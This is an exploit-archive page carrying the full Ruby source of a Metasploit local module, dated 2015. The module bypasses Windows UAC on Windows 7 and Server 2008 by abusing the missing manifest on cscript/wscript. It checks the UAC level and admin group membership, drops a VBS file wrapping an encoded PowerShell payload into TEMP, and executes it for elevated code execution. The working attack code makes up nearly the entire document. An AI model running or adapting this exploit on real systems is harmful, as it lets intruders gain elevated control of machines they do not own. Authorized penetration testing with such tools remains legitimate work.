what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Windows Escalate UAC Protection Bypass

Windows Escalate UAC Protection Bypass
Posted Sep 4, 2015
Authored by Ben Campbell, vozzie | Site metasploit.com

This Metasploit module will bypass Windows UAC by utilizing the missing .manifest on the script host cscript/wscript.exe binaries.

tags | exploit
systems | windows
SHA-256 | 6a2017090a1d8df299e19c2f05246d4fcd92fcba63db5b4f0d368934a069f10d

Windows Escalate UAC Protection Bypass

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking

include Exploit::FileDropper
include Exploit::Powershell
include Post::File
include Post::Windows::Priv
include Post::Windows::Runas

def initialize(info={})
super( update_info( info,
'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)',
'Description' => %q{
This module will bypass Windows UAC by utilizing the missing .manifest on the script host
cscript/wscript.exe binaries.
},
'License' => MSF_LICENSE,
'Author' => [
'Vozzie',
'Ben Campbell'
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
],
'DefaultTarget' => 0,
'References' => [
[
'URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html',
'URL', 'https://github.com/Vozzie/uacscript'
]
],
'DisclosureDate'=> 'Aug 22 2015'
))

end

def exploit
# Validate that we can actually do things before we bother
# doing any more work
validate_environment!
check_permissions!

# get all required environment variables in one shot instead. This
# is a better approach because we don't constantly make calls through
# the session to get the variables.
env_vars = get_envs('TEMP', 'WINDIR')

case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
)
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end

vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs"

upload_vbs(vbs_filepath)

cmd_exec("cscript.exe //B #{vbs_filepath}")
end

def check_permissions!
# Check if you are an admin
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?

if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
else
if admin_group
print_good('Part of Administrators group! Continuing...')
else
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end

if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
end
end

def upload_vbs(payload_filepath)
vbs = File.read(File.join(Msf::Config.data_directory,
'exploits',
'scripthost_uac_bypass',
'bypass.vbs'))

command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)

vbs.gsub!('COMMAND', command)
print_status('Uploading the Payload VBS to the filesystem...')
begin
vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..")
write_file(payload_filepath, vbs)
register_file_for_cleanup(payload_filepath)
rescue Rex::Post::Meterpreter::RequestError => e
fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")
end
end

def validate_environment!
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

winver = sysinfo['OS']

case winver
when /Windows (7|2008)/
print_good("#{winver} may be vulnerable.")
else
fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
end

if is_uac_enabled?
print_status('UAC is Enabled, checking level...')
else
unless is_in_admin_group?
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end
end
end
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    6 Files
  • 18
    Aug 18th
    4 Files
  • 19
    Aug 19th
    12 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close